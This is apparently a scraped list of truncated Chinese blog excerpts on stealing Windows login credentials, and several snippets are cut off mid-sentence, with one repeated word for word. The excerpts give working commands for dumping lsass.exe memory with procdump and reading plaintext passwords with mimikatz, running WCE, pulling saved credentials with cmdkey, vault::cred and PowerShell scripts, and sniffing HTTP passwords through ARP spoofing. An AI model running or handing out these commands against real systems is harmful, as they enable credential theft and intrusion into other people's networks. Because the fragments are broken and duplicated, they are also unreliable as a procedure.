0x00 原理 获取到内存文件 lsass.exe 进程 (它用于本地安全和登陆策略) 中存储的明文登录密码. 0x01 操作 Windows10/2012 以下的版本:1.上传 procdump 执行命令转存出 lsass.dmp 文件(需要管理员权限) procdump64.exe -accepteula -ma lsass.exe lsass.dmp 2.拿到 mimikatz 文件夹执行命令读明文: sekurlsa::minidump lsass.dmp sekurlsa::logon…
Mimikatz现在已经内置在Metasploit’s meterpreter里面,我们可以通过meterpreter下载.但是你如果觉得还要考虑杀毒软件,绑定payload之类的东西太过复杂,我们可以有更好的办法,只需要在自己的电脑上运行Mimikatz alpha(地址)版本,然后处理dump的LSASS进程内存文件就行! 那么如何dump LSASS进程内存呢.可以通过以下方式: 1.对于NT6可以使用windows自带的功能进行dump: 任务管理器—进程—显示所有用户进程—找到lsas…
思路: 就是通过系统自带的procdump去下载存储用户名密码的文件(应该不能那么说这个文件,但是这样理解没问题),然后用猕猴桃读取. procdump.exe Procdump是一个轻量级的Sysinternal团队开发的命令行工具, 它的主要目的是监控应用程序的CPU异常动向, 并在此异常时生成crash dump文件, 供研发人员和管理员确定问题发生的原因. 你还可以把它作为生成dump的工具使用在其他的脚本中. procdump下载地址:https://docs.microsoft.co…
0x1 概要 记得某位同学提起在XXX得到了一个一键生成明文的工具,觉得很是神奇... 然而我一看图标就知道是mimikatz,这工具是开源的,只要改两行代码就可以实现写死命令了. 顺带讲讲编译过程中的问题和解决方法. 0x2 详情 调试这个工具的时候,发现新版本没生成debug模式的选项,F11调试没有对应到源代码.仔细一看原来是没有生成调试文件. 设置让Release的程序也生成pdb文件即可. 另外mimikatz没有debug版,所以导致有些参数被优化了.没有办法跟进具体的变量和函数,所…
全世界,现在大约50%的网站没有使用SSL加密,天朝尤其多. 我们都知道通过HTTP发送的数据都是明文,没有使用任何加密,即使是在数据敏感的登录页面. 本文的目的是:如果你在不熟悉的网络环境中,要注意提高警惕. 没有人希望自己的密码暴露给他人,so,不要嗅探(狗)他人的密码. 想象有一个攻击者坐在某个咖啡馆里,桌子上放着他的笔记本电脑并连着咖啡馆的免费wifi.这个家伙就可以非常容易的获得网络里通信信息.如果密码是明文,连破解都省了. 系统要求: Wireshark ARP欺骗攻击(ARP sp…
前段时间mimikatz热传,主要是因为可以直接提取当前登录用户明文密码. 其实,有个更厉害的神器,无需那么多命令操作,一个命令搞定: C:\>wce -w WCE v1.3beta (Windows Credentials Editor) - (c) 2010,2011,2012 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity com) Use -h for help. test\MYDOMAIN:mypass1234 NETW…
1.运行cmdkey /list查看windows保存凭证 方法1.mimikaz mimikatz vault::cred 2.利用powershell尝试获取 windows 普通凭据类型中的明文密码 powershell-import F:\tools\powershell脚本\Invoke-WCMDump.ps1 powershell Invoke-WCMDdump 3.powershell试获取 web 凭据中的各类明文密码 powershell-import F:\tools\pow…
windows 2012 抓明文密码方法 默认配置是抓不到明文密码了,神器mimikatz显示Password为null Authentication Id : 0 ; 121279 (00000000:0001d9bf) Session : Interactive from 1 User Name : mickey Domain : WIN-B054LAOH5FC Logon Server : WIN-B054LAOH5FC Logon Time : 2014/2/7 16:13:37 SID…
1.前言 mimikatz框架是非常精妙的,粗浅讲一下修改的思路. 它的模块主要由各个结构体数组组成,根据传入的命令搜索执行相应命令的模块 mimikatz.c 部分代码: NTSTATUS mimikatz_doLocal(wchar_t * input) { NTSTATUS status = STATUS_SUCCESS; // 参数个数定义 int argc; // 获取输入的值,参数个数赋值 // wchar_t ** argv = CommandLineToArgvW(input,…
1.运行cmdkey /list查看windows保存凭证 方法1.mimikaz mimikatz vault::cred 2.利用powershell尝试获取 windows 普通凭据类型中的明文密码 powershell-import F:\tools\powershell脚本\Invoke-WCMDump.ps1 powershell Invoke-WCMDdump 3.powershell试获取 web 凭据中的各类明文密码 powershell-import F:\tools\pow…